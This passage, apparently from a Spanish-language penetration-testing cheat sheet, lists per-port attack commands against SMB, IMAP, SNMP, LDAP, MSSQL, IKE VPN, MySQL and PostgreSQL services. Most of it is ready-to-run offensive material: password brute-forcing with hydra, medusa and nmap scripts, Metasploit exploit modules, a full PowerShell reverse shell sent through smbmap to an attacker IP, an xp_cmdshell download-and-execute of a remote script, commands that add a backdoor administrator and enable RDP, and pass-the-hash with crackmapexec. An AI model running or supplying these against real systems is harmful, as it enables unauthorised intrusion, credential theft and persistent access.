└─$ nmap -n -sV --version-intensity=5 -sU -sS -Pn -p T:139,445,U:137 --script=xxx <ipTarget>

# SMB Relate NSE Scripts
# Try to retrieve NetBIOS and MAC
└─$ nbstat

# Enum

## podes visializar mas: └─$ cd /usr/share/nmap/scripts  
smb-enum-domains
smb-enum-groups
smb-enum-processes
smb-enum-sessions
smb-os-discovery
smb-server-stats
smb-system-info

# Intentos de recuperar información útil sobre archivos compartidos en volúmenes SMB
smb-ls

# Consultas de información gestionadas por el Windows Master Browser
smb-mbenum

# Intentando imprimir algo
smb-print-text

# Obtener información sobre el nivel de seguridad de SMB
smb-security-mode

# Vulnerables
smb-vuln-conficker (dangerous, can crash target)
smb-vuln-ms06-025 (Buffer overflow in RRAS)
smb-vuln-ms07-029 (Buffer overflow which can crash the RPC intrface in the DNS Server)
smb-vuln-ms08-067 (Buffer overflow/RCE. Dangerous, can crash the target)
smb-vuln-ms10-054 (Remote Memory Corruption. Result is BSOD -> DANGEROUS)
smb-vuln-ms10-061 (Print vulnerability. Safe and can\'t crash the target)
smb-vuln-ms17-010 (RCE, just checking if vulnerable)

```

Enumerar 

```
#enum4linux
└─$ enum4linux <ipTarget>

└─$ enum4linux -a -R 500-600,950-1150  (identifier le nom/domaine + users + shares)



#nbtscan -r consulta el servicio de nombres 
sudo nbtscan -r 192.168.0.1/24

Cliente

```
#Lista de recursos compartidos de smb
└─$ smbclient -L <ipTarget>
└─$ smbclient -L \\\\<ipTarget>\\

#Listar carpetas dentro de compartir
└─$ smbclient //<ipTarget>

# Conectar
└─$ smbclient \\\\<ipTarget>\\share

└─$ smbclient -U “DOMAINNAME\Username” \\\\<ipTarget>\\IPC$ password

# Specify username and no pass
└─$ smbclient -U “” -N \\\\<ipTarget>\\IPC$
└─$smbclient -U '%' -N \\\\<ipTarget>\\ADMIN$
└─$smbclient -U '%' -N \\\\<ipTarget>\\im_clearly_not_here

```

Metasploit

```
#Buscar
> search smb

> use auxiliary/scanner/smb/smb_enumusers
> use auxiliary/scanner/smb/smb_version
> use auxiliary/scanner/smb/smb2

Explotación 

>use exploit/windows/smb/ms17_010_psexec
>use exploit/linux/samba/trans2open


```

Fuerza bruta hydra

```
└─$ hydra -t 1 -V -f -l {Nombre de usuario} -P {Passwordlist} <ipTarget> smb

```

Descargar archivos

```
# Buscar un archivo y descargar
# Busca el archivo en modo recursivo y descárgalo dentro /usr/share/smbmap
└─$ sudo smbmap -R Folder -H <ipTarget> -A <FileName> -q 

# Descargar todo
└─$ smbclient //<ipTarget>/<share>
> mask ""
> recurse
> prompt
> mget *
# Descargar todo al directorio actual

```
Comandos:
    * mask: especifica la máscara que se utiliza para filtrar los archivos dentro del directorio (e.g. "" for all files).
    * recurse: activa la recursividad (default: off).
    * prompt: desactiva la solicitud de nombres de archivo (default: on).
    * mget: copia todos los archivos que coincidan con la máscara del host a la máquina cliente.

A tener en cuenta. puede seguir los siguientes pasos. 

```
# Enumerar hostname
└─$ enum4linux -n <ipTarget>
└─$ nmblookup -A <ipTarget>
└─$ nmap --script=smb-enum* --script-args=unsafe=1 -T5 <ipTarget>

# Ver Versión
└─$ smbver.sh <ipTarget>
Metasploit; > use scanner/smb/smb_version
└─$ ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]' 
└─$ smbclient -L \\\\<ipTarget>

# Get Shares
└─$ smbmap -H  <ipTarget> -R 
└─$ echo exit | smbclient -L \\\\<ipTarget>
└─$ smbclient \\\\<ipTarget>\\
└─$ smbclient -L //<ipTarget> -N
└─$ nmap --script smb-enum-shares -p139,445 -T4 -Pn <ipTarget>
└─$ smbclient -L \\\\<ipTarget>\\
# If got error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED"
└─$ smbclient -L //<ipTarget>/ --option='client min protocol=NT1'

# Comprobar sesiones nulas
└─$ smbmap -H <ipTarget>
└─$ rpcclient -U "" -N <ipTarget>
└─$ smbclient //<ipTarget>/IPC$ -N

# Explotar sesiones nulas
└─$ enum -s <ipTarget>
└─$ enum -U <ipTarget>
└─$ enum -P <ipTarget>
└─$ enum4linux -a <ipTarget>

#https://github.com/cddmp/enum4linux-ng/
└─$ enum4linux-ng.py <ipTarget> -A -C
/usr/share/doc/python3-impacket/examples/samrdump.py <ipTarget>

# Conectarse a recursos compartidos de nombre de usuario
└─$ smbclient //<ipTarget>/share -U username

# Conéctese para compartir de forma anónima
└─$ smbclient \\\\<ipTarget>\\
└─$ smbclient //<ipTarget>/
└─$ smbclient //<ipTarget>/
└─$ smbclient //<ipTarget>/<""share name"">
└─$ rpcclient -U " " <ipTarget>
└─$ rpcclient -U " " -N <ipTarget>

# Check vulns
nmap --script smb-vuln* -p139,445 -T4 -Pn <ipTarget>

# Multi exploits
Metasploit; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost <ipTarget>; run

# Inicio de sesión de fuerza bruta
└─$ medusa -h <ipTarget> -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt 
└─$ nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt <ipTarget>  -vvvv
└─$ nmap –script smb-brute <ipTarget>

# nmap smb enum & vuln 
└─$ nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 <ipTarget>
└─$ nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 <ipTarget>

# Montar smb volumen linux
└─$ mount -t cifs -o username=user,password=password //<ipTarget>/share /mnt/share

# rpcclient commands
└─$ rpcclient -U "" <ipTarget>
    srvinfo
    enumdomusers
    getdompwinfo
    querydominfo
    netshareenum
    netshareenumall

# Ejecute cmd sobre smb desde linux
└─$ winexe -U username //<ipTarget> "cmd.exe" --system

# smbmap
└─$ smbmap.py -H <ipTarget> -u administrator -p pass1234 #Enum
└─$ smbmap.py -u username -p 'P@$$pass1234' -d DOMAINNAME -x 'net group "Domain Admins" /domain' -H <ipTarget> #RCE
└─$ smbmap.py -H <ipTarget> -u username -p 'P@$$pass1234!' -L # Drive Listing
└─$ smbmap.py -u username -p 'P@$$pass1234!' -d ABC -H <ipTarget> -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.X""""; $port=""""4444"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' # Reverse Shell

# Check
\Policies\{REG}\MACHINE\Preferences\Groups\Groups.xml look for user&pass "gpp-decrypt "

# CrackMapExec
└─$ crackmapexec smb <ipTarget> -u LA-ITAdmin -H 573f6308519b3df23d9ae2137f549b15 --local
crackmapexec smb <ipTarget> -u LA-ITAdmin -H 573f6308519b3df23d9ae2137f549b15 --local --lsa

# Impacket
└─$ python3 samdump.py SMB <ipTarget>

# Verifique los sistemas con la firma SMB no habilitada
└─$ python3 RunFinger.py -i <ipTarget>

```

### Puerto 143 IMAP

> Protocolo de acceso a mensajes de internet

Puerto predeterminado: 143 (puerto no cifrado predeterminado), 993 (conexión de forma segura, recomendable) 

Nmap

```
└─$ nmap -v -sV --version-intensity=5 --script imap-capabilities -p T:143 <ipTarget>

```
Banner

```
└─$ telnet <ipTarget> 143

```
Banner y conexión de prueba

```
└─$ nc -nv <ipTarget> 143
└─$ A1 LOGIN “root” “”
└─$ A1 LOGIN root toor
└─$ A1 LOGIN root root

└─$ openssl s_client -connect <ipTarget>:993 -quiet

```
Fuerza bruta

```
└─$ hydra -l USERNAME -P /path/to/passwords.txt -f <ipTarget> imap -V
└─$ hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <ipTarget> imap -V
└─$ nmap -sV --script imap-brute -p <port> <ipTarget>

```
Metasploit 

```
> use auxiliar/escáner/imap/imap_version

```
Curl

```
#Listar mailbox (comando LIST “” “*”)
 └─$ curl -k 'imaps://<ipTarget>/' --user user:pass

```
Shodan

```
port:143 CAPABILITY
port:993 CAPABILITY

```

### Puerto 161/162 UDP - SNMP

El agente SNMP recibe solicitudes en el puerto UDP 161.

El administrador recibe notificaciones (Traps e InformRequests) en el puerto 162.

Cuando se utiliza con Transport Layer Security o Datagram Transport Layer Security, las solicitudes se reciben en el puerto 10161 y las notificaciones se envían al puerto 10162.

Archivos de configuración

snmp.conf
snmpd.conf
snmp-config.xml


```
└─$ nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes <ipTarget>

└─$ nmap -vv -sV --version-intensity=5 -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes <ipTarget>

└─$ nmap <ipTarget> -Pn -sU -p 161 --script=snmp-brute,snmp-hh3c-logins,snmp-info,snmp-interfaces,snmp-ios-config,snmp-netstat,snmp-processes,snmp-sysdescr,snmp-win32-services,snmp-win32-shares,snmp-win32-software,snmp-win32-users

└─$ snmp-check <ipTarget> -c public|private|community

└─$ snmpwalk -c public -v1 <ipTarget> 1
└─$ snmpwalk -c public -v1 <ipTarget> 1 > snmpwalk.txt
└─$ snmpwalk -c private -v1 <ipTarget> 1
└─$ snmpwalk -c manager -v1 <ipTarget> 1

└─$ onesixtyone -c /usr/share/doc/onesixtyone/dict.txt <ipTarget>
└─$ onesixtyone -c /usr/share/doc/onesixtyone/dict.txt -i <ipTarget.txt>


# Impacket
└─$ python3 samdump.py SNMP <ipTarget> 

# Metasploit 
> use auxiliary/scanner/misc/oki_scanner                                    
> use auxiliary/scanner/snmp/aix_version                                   
> use auxiliary/scanner/snmp/arris_dg950                                   
> use auxiliary/scanner/snmp/brocade_enumhash                               
> use auxiliary/scanner/snmp/cisco_config_tftp                               
> use auxiliary/scanner/snmp/cisco_upload_file                              
> use auxiliary/scanner/snmp/cnpilot_r_snmp_loot                             
> use auxiliary/scanner/snmp/epmp1000_snmp_loot                             
> use auxiliary/scanner/snmp/netopia_enum                                    
> use auxiliary/scanner/snmp/sbg6580_enum                                 
> use auxiliary/scanner/snmp/snmp_enum                                 
> use auxiliary/scanner/snmp/snmp_enum_hp_laserjet                           
> use auxiliary/scanner/snmp/snmp_enumshares                                
> use auxiliary/scanner/snmp/snmp_enumusers                                 
> use auxiliary/scanner/snmp/snmp_login

```
Recurso

```
https://blog.cedrictemple.net/239-faire-des-requetes-snmp-en-ligne-de-commande-sous-linux/
```

### Puerto 199 SNMP

SNMP significa Protocolo simple de administración de redes

Snmpwalk

```
# El indicador -c es la cadena comunitaria que suele ser "pública" y "privada".
└─$ snmpwalk -c public -v1 -t <ipTarget>

```
### Puerto 389/636/3269 (LDAP)

> LDAP (Protocolo ligero de acceso a directorios) es un protocolo de software que permite a cualquier persona localizar organizaciones, personas y otros recursos, como archivos y dispositivos en una red, ya sea en la Internet pública o en una intranet corporativa. LDAP es una versión "ligera" (menor cantidad de código) del Protocolo de acceso a directorios (DAP).

Puertos predeterminados: 389 (LDAP), 636 (LDAPS), 3268, 3269 (LDAP Global catalog ActiveDirectory)

General

Banner

```
└─$ nmap -p 389 --script ldap-search -Pn <ipTarget>

```

```
# syntax
└─$ ldapsearch <bind options> -b <base to search from> <search filter> <attributes>

# Atributos interesantes para la clase de usuario
ldapsearch “(objectClass=user)” interesting attributes:
- sAMAccountName
- userPrincipalName
- memberOf (groups)
- badPwdCount (failed logins)
- lastLogoff (timestamp)
- lastLogon (timestamp)
- pwdLastSet (timestamp)
- logonCount

# Atributos interesantes para la clase grupal.
ldapsearch “(objectClass=group)” interesting attributes:
- cn
- member (one per user/group)
- memberOf (if nested in another group)

# Atributos interesantes para la clase de computación
ldapsearch “(objectClass=computer)” interesting attributes:
- name (NetBIOS name)
- DNSHostName (FQDN) => combine it with DNS lookups and you can enumerate every IP address in the domain without scanning
- operatingSystem
- operatingSystemVersion (patch level)
- lastLogonTimestamp
- servicePrincipalName (running services => TERMSRV, HTTP, MSSQL)

```
ldapsearch

```
# Base
└─$ ldapsearch -h <ipTarget> -x

# Intento de obtener el contexto de nomenclatura LDAP
└─$ ldapsearch -h <ipTarget> -x -s base namingcontexts

# Necesita contexto de nomenclatura para hacer un gran volcado
└─$ ldapsearch -h <ipTarget> -x -b "{Naming_Context}"
└─$ ldapsearch -h <ipTarget> -x -b "DC=cascade,DC=local" '(objectClass=person)' > persons


```

Fuerza bruta

```
└─$ ldapsearch -x -h <ipTarget> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"
└─$ ldapsearch -x -h <ipTarget> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"

# Hydra
└─$ hydra -l {Username} -P Passwordlist} <ipTarget> ldap2 -V -f

```

### Puerto 1433/1434/1443 MSSQL
 
MSSql significa lenguaje de consulta estructurado de Microsoft
Comandos

```
#Obtener la version de Microsoft SQL
@@version

#intentar habilitar la ejecucion de codigo
enable_xp_cmdshell

#Ejecutar comandos despues de habilitar la ejecucion de codigo
EXEC xp_cmdshell whoami

#Descargue y ejecute el shell del atacante
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://127.0.0.1/shell.ps1") | powershell -noprofile'

```

Nmap

```
└─$ nmap -p 1433 -sU --script=ms-sql-info.nse <ipTarget>

# Using nmap NSE scripts
└─$ nmap -n -sV --version-intensity=5 -sT -Pn -p T:1433 --script=xxxx <ipTarget>

# Cuentas de fuerza bruta y contraseña contra un servidor MSSQL
ms-sql-brute

# Consulta las instancias de Microsoft SQL Server (ms-sql) para obtener una lista de bases de datos, servidores vinculados y ajustes de configuración.
# Credentials required
ms-sql-config

# Consulta el servicio de Microsoft SQL Browser para el DAC (Dedicated AdminConnection)
ms-sql-dac

# Vuelca los hashes de contraseña de un servidor MS-SQL en un formato adecuado
# Credentials required
ms-sql-dump-hashes

# Intenta autenticarse en servidores Microsoft SQL utilizando una contraseña vacía para la cuenta sysadmin (sa).
ms-sql-empty-password

# Consulta las instancias de Microsoft SQL Server (ms-sql) para obtener una lista de las bases de datos a las que tiene acceso un usuario
# Credentials required
ms-sql-hasdbaccess

# Intentos de determinar la información de configuración y versión para las instancias de Microsoft SQLServer
ms-sql-info

# Ejecuta una consulta contra Microsoft SQL Server (ms-sql).
# Credentials required.
ms-sql-query

# Consulta Microsoft SQL Server (ms-sql) para obtener una lista de tablas por base de datos.
# Credentials required
ms-sql-tables

# Intentos de ejecutar un comando utilizando el shell de comandos de Microsoft SQL Server (ms-sql)
# Credentials required
ms-sql-xp-cmdshell

# =)
└─$ nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <ipTarget>
```
Metasploit

```
>use auxiliary/scanner/mssql/mssql_ping

>use auxiliary/scanner/mssql/mssql_login

>use exploit/windows/mssql/mssql_payload

```
Hydra

```
└─$ hydra -l sa -P /home/password.txt -V <ipTarget> mssql

```

sqsh

```
└─$ sqsh -S <ipTarget> -U sa
└─$ sqsh -S <ipTarget> -U sa -P password

#Enable xq_cmdshell
exec sp_configure 'show advanced options', 1
go
reconfigure
go
exec sp_configure 'xp_cmdshell', 1
go
reconfigure
go

#Ejecutar comando del sistema
xp_cmdshell 'net user byte bytepass /add'
go
xp_cmdshell 'net localgroup Administrators byte /add'
go
xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
go


EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("whoami")'

```

### Puerto 1721/500 (VPN)

```
# Suplantación de IP de autenticación IKEv2
└─$ ike-scan --sport=1723 --dport=1723 --sourceip=IP_To_Spoof --ikev2 <ipTarget>

# Probar todos los modos de autenticación
└─$ ike-scan --dport=1723 --auth=1 <ipTarget>
└─$ ike-scan --dport=1723 --auth=3 <ipTarget>
└─$ ike-scan --dport=1723 --auth=64221 <ipTarget>

# Suplantación de IP usando ike-scan
└─$ ike-scan --dport=1723 --sourceip=IP_To_Spoof  --auth=1 <ipTarget>
└─$ ike-scan --dport=1723 --sourceip=IP_To_Spoof  --auth=3 <ipTarget>
└─$ ike-scan --dport=1723 --sourceip=IP_To_Spoof  --auth=64221 <ipTarget>

# Suplantación de IP y modo agresivo
└─$ ike-scan --dport=1723 --sourceip=IP_To_Spoof -A --auth=1 <ipTarget>
└─$ ike-scan --dport=1723 --sourceip=IP_To_Spoof -A --auth=3 <ipTarget>
└─$ ike-scan --dport=1723 --sourceip=IP_To_Spoof -A --auth=64221 <ipTarget>
# Mostrar huella digital
└─$ ike-scan --dport=1723 --sourceip=IP_To_Spoof -A --auth=1 --showbackoff <ipTarget>
└─$ ike-scan --dport=1723 --sourceip=IP_To_Spoof -A --auth=3 --showbackoff <ipTarget>
└─$ ike-scan --dport=1723 --sourceip=IP_To_Spoof -A --auth=64221 --showbackoff <ipTarget>

# Descifrar la clave usando psk-crack
└─$ psk-crack hash-file.txt
└─$ psk-crack -b 5 IP
└─$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" <ipTarget>
└─$ psk-crack -d wordlist.txt <ipTarget>

```

### Puerto 3306 MySQL

MySQL es un sistema de gestión de bases de datos relacionales (RDBMS) de código abierto disponible gratuitamente que utiliza lenguaje de consulta estructurado (SQL).

Conectar
```
#local
└─$ mysql -u root # conectarse a la raíz sin contraseña
└─$ mysql -u root -p # Se le pedirá contraseña

#remoto
└─$ mysql -h <ipTarget> -u root
└─$ mysql -h <ipTarget> -u root@localhost

```

Enumeración

```
└─$ nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <ipTarget>

└─$ nmap -p 3306 --script mysql-query --script-args='query=" query"[,nombre de usuario= username,contraseña= password] <ipTarget>'

# Metasploit
msf> use auxiliary/scanner/mysql/mysql_login   
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds 
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

```

Fuerza Bruta

```
# hydra
└─$ hydra -L usernames.txt -P pass.txt <ipTarget> mysql
└─$ proxychains hydra -t 1 -l root -P /home//unix_passwords.txt <ipTarget> mysql   

# msfconsole
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false

# medusa
└─$ medusa -h <ipTarget> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql

```

Comandos clásicos

```
show databases;
use database_name;
show tables;
describe table_name;
select host, user, password from mysql.user;

```

Identificación y scan

```
# Using nmap NSE scripts
└─$ nmap -n -sV --version-intensity=5 -Pn -p T:3306 --script=xxxx <ipTarget>

# Audits MySQL database server security configuration
mysql-audit

# Bruteforce accounts and password against a MySQL Server
mysql-brute

# Attempts to list all databases on a MySQL server. (creds required)
mysql-databases

#Dumps the password hashes from an MySQL server in a format suitable (creds required)
mysql-dump-hashes

# Checks for MySQL servers with an empty password for root or anonymous.
mysql-empty-password

# Performs valid-user enumeration against MySQL server using a bug
mysql-enum

# Connects to a MySQL server and prints information such as the protocol and version numbers, thread ID, status, capabilities, and the password salt.
mysql-info

# Runs a query against a MySQL database and returns the results as a table. (creds required)
mysql-query

# Attempts to list all users on a MySQL server.
mysql-users

# Attempts to show all variables on a MySQL server.
mysql-variables

# Attempts to bypass authentication in MySQL and MariaDB servers by exploiting CVE2012-2122. If its vulnerable, it will also attempt to dump the MySQL usernames and password hashes. 
mysql-vuln-cve2012-2122

```

### Puerto 5432 PostgreSQL

```
└─$ psql -h <ipTarget> -U postgres -W

# Default creds
postgres : postgres
postgres : password
postgres : admin
admin : admin
admin : password

pg_dump --host=<ipTarget> --username=postgres --password --dbname=template1 --table='users' -f output_pgdump

```

Metasploit 

```
> use auxiliary/scanner/postgres/postgres_version
> use auxiliary/scanner/postgres/postgres_dbname_flag_injection

# Inicio
> use auxiliary/scanner/postgres/postgres_hashdump
> use auxiliary/scanner/postgres/postgres_schemadump
> use auxiliary/admin/postgres/postgres_readfile
> use exploit/linux/postgres/postgres_payload
> use exploit/windows/postgres/postgres_payload

```

